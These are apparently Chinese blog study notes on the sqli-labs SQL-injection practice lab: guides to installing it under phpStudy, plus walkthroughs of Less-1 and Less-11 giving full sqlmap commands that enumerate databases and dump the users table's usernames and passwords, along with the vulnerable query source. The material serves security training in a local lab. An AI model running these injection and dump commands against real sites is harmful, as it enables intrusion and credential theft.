目录
 
类型
 
-dbs枚举数据库
 
--tables枚举数据库表
 
--columns枚举列
 
--dump枚举数据
 
查看源代码
 

类型
 
基于错误-字符串
 
 
 

  
  
 
 
当然，因为之前已经通过sql注入看到了数据库，正常情况下应该是失败，而且网站一般有验证码。
 
 
 

  
  
 
 
 
 

  
  
 
 
sql语句猜测
 
select * from users where username="参数" and password="参数" LIMIT 0,1
 
-dbs枚举数据库
 
使用-o参数优化,--batch参数进行跳过
 
不必尝试以下语句
 
python sqlmap.py -u "http://192.168.31.12/sqli-labs_1/Less-11/" -o --data="username:value1&password=value2&submit=submit" -dbs --batch
 
好吧，猜错了，以为就是回显的，还是抓下包吧。
 
 
 

  
  
 
 
可以看到参数名和sql语句中的不一样，是uname和passwd
 
python sqlmap.py -u "http://192.168.31.12/sqli-labs_1/Less-11/" -o --data="uname:value1&passwd=value2&submit=Submit" -dbs --batch
 
太慢，添加--technique参数指定注入技术，添加--dbms参数指定数据库，添加--threads参数添加线程
 
python sqlmap.py -u "http://192.168.31.12/sqli-labs_1/Less-11/" -o --threads 8 --dbms mysql --technique UES --data="uname:value1&passwd=value2&submit=Submit" -dbs --batch
 
还是不行。。。
 
 
 

  
  
 
 
 无fuck可说，不知道为什么，有清楚的朋友麻烦评论区告知一下，万分感谢！
 
换个思路，既然抓到了包，就使用-r参数读取文件吧，先保存一下，burpsuite中右键，copy to file
 
python sqlmap.py -r "E:\Workspace\Burp_suite_workspace\less11" -dbs
 
 
 
 
 

  
  
 
 
这也太棒了，一分钟搞定，i了i了，接下来就很容易了
 
--tables枚举数据库表
 
添加了--dbms，我看速度还很快，没加其他优化
 
python sqlmap.py -r "E:\Workspace\Burp_suite_workspace\less11" --dbms mysql -D security --tables --batch
 
确实很快，10秒钟
 
 
 

  
  
 
 
--columns枚举列
 
python sqlmap.py -r "E:\Workspace\Burp_suite_workspace\less11" --dbms mysql -D security -T users --columns --batch
 
 获取列名
 
 
 

  
  
 
 
--dump枚举数据
 
python sqlmap.py -r "E:\Workspace\Burp_suite_workspace\less11" --dbms mysql -D security -T users -C username,password -dump --dump-format csv --batch
 
看过之前文章的朋友可能发现多了点什么，不错，新学了一个参数--dump-format,可以将结果保存成csv html sqlite形式，我选择了csv,因为一般用python写脚本比较多，csv格式做数据处理更方便。
 
 
 

  
  
 
 
 
 

  
  
 
 
----------------------------------------------------202007111更新--------------------------------------------
 
今天学习了新的参数，简直太棒了，它就是--forms，看一下速度
 
 
 

  
  
 
 
 
 

  
  
 
 
 半分钟搞定，sqlmap可以自己抓包。
 
总结，对于POST方式的表单，参数有三个
 
--data 需要自己手工找到参数名以及一些信息
-r 需要自己抓包
--forms sqlmap自动抓包获取参数
---------------------------------------------------202007111更新------------------------------------------------
 
查看源代码
 
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
 
 更多内容查看：网络安全-自学笔记
 
喜欢本文的请动动小手点个赞，收藏一下，有问题请下方评论，转载请注明出处，并附有原文链接，谢谢！如有侵权，请及时联系。如果您感觉有所收获，自愿打赏，可选择支付宝18833895206（小于），您的支持是我不断更新的动力。
 
 
 
 

引言：我的系列博客[网络安全学习篇]上线了，小编也是初次创作博客，经验不足；对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙，其实看到目录有300多集的时候，讲道理，有点怂了，所以我就想到了通过写博客（课程笔记）的形式去学习它，虽然写博客会让我多花几倍的时间去学习它，但是当我完成一篇博客所获得的成就感和你们对于我的认同感，让我很满足，能够鼓励我一天天的坚持下去，也希望和我一起学习本期视频的"同道"们也能给一直坚持下去。我们大家一起加油。由于作者本身也是网络信息安全小白，大部分知识点都是初次接触，出现对其理解不深入，不完整，甚至也会出现错误有问题的地方，希望大家谅解、留言提出指正，同时也欢迎大家来找我一起交流学习！！！
 
往期博客：
 
[网络安全学习篇49]：渗透测试方法论
 
[网络安全学习篇50]：Web架构安全分析
 
[网络安全学习篇51]：信息收集
 
[网络安全学习篇52]：扫描技术
 
[网络安全学习篇53]：口令破解
 
[网络安全学习篇附]：DVWA 靶场搭建
 
[网络安全学习篇附]：Mutillidae 靶场搭建
 
[网络安全学习篇附]：sqli-labs 靶场环境搭建（本篇）
 
 
 
目录
 
 
 
sqli-labs 靶场环境搭建
 
搭建环境
 
sqli-labs
 

sqli-labs 靶场环境搭建
 
搭建环境
 
phpstudy
 
虚拟机：win2008
 
 
 
sqli-labs
 
 
 
网盘链接   提取码：ohsy
 
 
GitHub：https://github.com/Audi-1/sqli-labs
 
 
解压，将其移动至C:\phpStudy\WWW\下
 
修改数据库配置文件
 
C:\phpStudy\WWW\sqli-labs\sql-connections\db-creds
 
 
保存退出
 
浏览器打开，点击Setup/reset Database for labs 
 
 
创建成功，接下来就可以进行SQL注入的练习了。
 

目录
 
类型
 
注入判断
 
-u参数
 
 -dbs参数爆数据库
 
 -tables参数爆表
 
-columns爆列
 
 -dump爆数据
 
查看源代码
 
查看数据库
 

类型
 
基于字符串的错误
 
注入判断
 
?id=1'
 
 
 
 
 

  
  
 
 
根据提示猜测，sql语句大概为
 
select * from 表名 where id = 参数 LIMIT 0,1
 
-u参数
 
python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-1/?id=1"
 
 
 

  
  
 
 
 共发现4种注入类型
 
 
 

  
  
 
 
 -dbs参数爆数据库
 
python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-1/?id=1" -dbs
 
 
 
 
 

  
  
 
 
 -tables参数爆表
 
python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-1/?id=1" -D security -tables
 
 
 

  
  
 
 
-columns爆列
 
python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-1/?id=1" -D security -T users -columns
 
 
 

  
  
 
 
 -dump爆数据
 
选择把三列数据都爆出来
 
python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-1/?id=1" -D security -T users -C id,username,password -dump
 
 
 

  
  
 
 
查看源代码
 
sql语句为
 
SELECT * FROM users WHERE id='$id' LIMIT 0,1
 
查看数据库
 
 
 

  
  
 
 
更多内容查看：网络安全-自学笔记
 
有问题请下方评论，转载请注明出处，并附有原文链接，谢谢！如有侵权，请及时联系。

2021年准备在工作之余加强网络安全这块知识的学习，博文主要是记录自己的学习笔记，内容比较基础。
 
一、SQLi-Labs是什么？
 
SQLi-Labs是一个印度程序员写的，是一个专业的SQL注入练习平台，适用于GET和POST场景。
 
二、工具准备
 VMware虚拟机：VMware虚拟机下载
 Windows操作系统：操作系统下载
 PHPstudy： phpstudy安装包下载
 sqlis-lab：https://github.com/Audi-1/sqli-labs
 
三、安装阶段
 1.安装VMware虚拟机
 
2.在虚拟机中安装Windows操作系统
 
步骤1，2不做赘述
 
3.安装PHPstudy
 3.1 下载
 建议下载2018版本
 
 

 将下载好的安装包拷贝到Windows系统
 
 3.2安装
 
 
由于我虚拟机只有一个盘符，便直接安装到了C盘
 
 
3.3 配置PHPstudy
 运行软件
 
 
修改一下数据库的密码
 
 这里我将其修改为root
 
 
4.安装sqli-lab
 4.1下载sqli-lab
 

 4.2安装
 将下载的文件解压放进刚才安装phpstudy的www目录下
 
 
4.3配置
 我们只需设置一下数据库的账号密码即可
 路径：C:\phpStudy\PHPTutorial\WWW\sqli-labs-master\sql-connections
 我将账号密码都设置成了root
 
 
5.验证环境
 浏览器输入 http://localhost/sqli-labs-master/
 
 
点击setup/reset Database for labs
 
 
接着返回点击SQLi-LABS Page-1(Basic Challenges)
 
 至此环境搭建完毕